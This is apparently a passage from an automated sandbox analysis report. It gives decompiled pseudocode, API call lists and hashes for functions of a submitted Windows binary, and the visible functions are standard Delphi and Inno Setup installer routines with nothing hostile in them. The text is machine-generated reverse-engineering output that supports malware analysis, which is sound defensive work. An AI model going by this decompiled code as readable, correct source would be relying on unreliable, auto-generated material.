                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3968769311-0
                                                                                                                            • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                                                            • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                                                                            • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                                                            • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004971AC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                                                                                            0x004971ac
                                                                                                                            0x004971ac
                                                                                                                            0x004971ac
                                                                                                                            0x004971ad
                                                                                                                            0x004971af
                                                                                                                            0x004971b6
                                                                                                                            0x004971bb
                                                                                                                            0x004971bd
                                                                                                                            0x004971c0
                                                                                                                            0x004971c0
                                                                                                                            0x004971c5
                                                                                                                            0x004971c7
                                                                                                                            0x004971ca
                                                                                                                            0x004971ce
                                                                                                                            0x004971cf
                                                                                                                            0x004971d4
                                                                                                                            0x004971d7
                                                                                                                            0x004971de
                                                                                                                            0x004971e3
                                                                                                                            0x004971e9
                                                                                                                            0x004971ee
                                                                                                                            0x004971f6
                                                                                                                            0x004971fa
                                                                                                                            0x004971fa
                                                                                                                            0x004971fa
                                                                                                                            0x004971fc
                                                                                                                            0x00497203
                                                                                                                            0x00497284
                                                                                                                            0x0049728c
                                                                                                                            0x00497205
                                                                                                                            0x00497209
                                                                                                                            0x0049722c
                                                                                                                            0x0049723e
                                                                                                                            0x0049720b
                                                                                                                            0x00497211
                                                                                                                            0x00497224
                                                                                                                            0x00497224
                                                                                                                            0x00497245
                                                                                                                            0x00497251
                                                                                                                            0x00497259
                                                                                                                            0x0049725c
                                                                                                                            0x00497266
                                                                                                                            0x00497273
                                                                                                                            0x00497278
                                                                                                                            0x00497278
                                                                                                                            0x00497245
                                                                                                                            0x00497291
                                                                                                                            0x00497294
                                                                                                                            0x00497297
                                                                                                                            0x004972a4

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                                                                              • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0049727F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$CreateErrorLast
                                                                                                                            • String ID: 0@G$XtI$l@
                                                                                                                            • API String ID: 3539746228-385768319
                                                                                                                            • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                                                            • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                                                                            • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                                                                            • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406424 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 36%
                                                                                                                            			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                                                                            0x00406425
                                                                                                                            0x00406427
                                                                                                                            0x0040642c
                                                                                                                            0x00406446
                                                                                                                            0x004064d9
                                                                                                                            0x004064d9
                                                                                                                            0x00000000
                                                                                                                            0x0040644c
                                                                                                                            0x0040644c
                                                                                                                            0x0040644f
                                                                                                                            0x00406450
                                                                                                                            0x00406452
                                                                                                                            0x00406459
                                                                                                                            0x00000000
                                                                                                                            0x00406465
                                                                                                                            0x0040646d
                                                                                                                            0x00406472
                                                                                                                            0x00406473
                                                                                                                            0x00406478
                                                                                                                            0x0040647b
                                                                                                                            0x00406481
                                                                                                                            0x00406485
                                                                                                                            0x00406486
                                                                                                                            0x0040648b
                                                                                                                            0x00406492
                                                                                                                            0x004064bc
                                                                                                                            0x004064be
                                                                                                                            0x004064c1
                                                                                                                            0x004064c4
                                                                                                                            0x004064d1
                                                                                                                            0x00406494
                                                                                                                            0x00406494
                                                                                                                            0x004064af
                                                                                                                            0x004064b2
                                                                                                                            0x004064ba
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004064ba
                                                                                                                            0x004064a5
                                                                                                                            0x004064a8
                                                                                                                            0x004064e0
                                                                                                                            0x004064e6
                                                                                                                            0x004064e6
                                                                                                                            0x00406492
                                                                                                                            0x00406459
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                                                            • API String ID: 4275029093-79381301
                                                                                                                            • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                                                            • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                                                                            • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                                                                            • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004076B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 43%
                                                                                                                            			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                                                                            0x004076c0
                                                                                                                            0x00407726
                                                                                                                            0x00407728
                                                                                                                            0x0040772a
                                                                                                                            0x0040772f
                                                                                                                            0x00407734
                                                                                                                            0x00407736
                                                                                                                            0x00407736
                                                                                                                            0x0040773c
                                                                                                                            0x004076c2
                                                                                                                            0x004076cb
                                                                                                                            0x004076db
                                                                                                                            0x004076db
                                                                                                                            0x004076f7
                                                                                                                            0x0040770a
                                                                                                                            0x0040771e
                                                                                                                            0x0040771e

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleWrite
                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                            • API String ID: 3320372497-2970929446
                                                                                                                            • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                                                            • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                                                                            • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                                                                            • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00420524 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                                                                                            0x00420532
                                                                                                                            0x0042055f
                                                                                                                            0x00420564
                                                                                                                            0x00420569
                                                                                                                            0x00420573
                                                                                                                            0x00420534
                                                                                                                            0x00420544
                                                                                                                            0x00420549
                                                                                                                            0x0042054e
                                                                                                                            0x0042054e

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule$AddressProc
                                                                                                                            • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                                                                            • API String ID: 1883125708-3870080525
                                                                                                                            • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                                                            • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                                                                            • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                                                                            • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042931C Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                                                                            0x0042931c
                                                                                                                            0x00429328
                                                                                                                            0x0042932e
                                                                                                                            0x00429334
                                                                                                                            0x00429344
                                                                                                                            0x0042934b
                                                                                                                            0x0042934b
                                                                                                                            0x00429356
                                                                                                                            0x00429364
                                                                                                                            0x004294ef
                                                                                                                            0x004294f6
                                                                                                                            0x004294f7
                                                                                                                            0x00000000
                                                                                                                            0x0042936a
                                                                                                                            0x0042936d
                                                                                                                            0x0042938b
                                                                                                                            0x0042936f
                                                                                                                            0x0042937a
                                                                                                                            0x0042937a
                                                                                                                            0x0042939a
                                                                                                                            0x004293a6
                                                                                                                            0x004293a9
                                                                                                                            0x00429416
                                                                                                                            0x0042941c
                                                                                                                            0x0042941d
                                                                                                                            0x00429423
                                                                                                                            0x00429424
                                                                                                                            0x00429426
                                                                                                                            0x0042942b
                                                                                                                            0x0042942f
                                                                                                                            0x00429431
                                                                                                                            0x00429431
                                                                                                                            0x0042943c
                                                                                                                            0x00429447
                                                                                                                            0x00429452
                                                                                                                            0x0042945b
                                                                                                                            0x0042945e
                                                                                                                            0x0042947a
                                                                                                                            0x00429481
                                                                                                                            0x0042948c
                                                                                                                            0x004294a3
                                                                                                                            0x004294a8
                                                                                                                            0x004294bc
                                                                                                                            0x004294c1
                                                                                                                            0x004294d4
                                                                                                                            0x004294d4
                                                                                                                            0x004294dd
                                                                                                                            0x00429460
                                                                                                                            0x00429460
                                                                                                                            0x00429461
                                                                                                                            0x00429467
                                                                                                                            0x0042946d
                                                                                                                            0x0042946f
                                                                                                                            0x00429471
                                                                                                                            0x00429474
                                                                                                                            0x00429477
                                                                                                                            0x00429477
                                                                                                                            0x0042947a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0042947a
                                                                                                                            0x004293ab
                                                                                                                            0x004293ab
                                                                                                                            0x004293ac
                                                                                                                            0x004293ae
                                                                                                                            0x004293b4
                                                                                                                            0x004293b6
                                                                                                                            0x004293c5
                                                                                                                            0x004293c6
                                                                                                                            0x004293d0
                                                                                                                            0x004293d1
                                                                                                                            0x004293d6
                                                                                                                            0x004293e1
                                                                                                                            0x004293e2
                                                                                                                            0x004293ec
                                                                                                                            0x004293ed
                                                                                                                            0x004293f2
                                                                                                                            0x0042940d
                                                                                                                            0x0042940f
                                                                                                                            0x00429410
                                                                                                                            0x00429413
                                                                                                                            0x00429413
                                                                                                                            0x00000000
                                                                                                                            0x004293b4
                                                                                                                            0x004293a9

                                                                                                                            APIs
                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 351091851-0
                                                                                                                            • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                                                            • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                                                                            • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                                                            • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AFA44 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 34%
                                                                                                                            			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
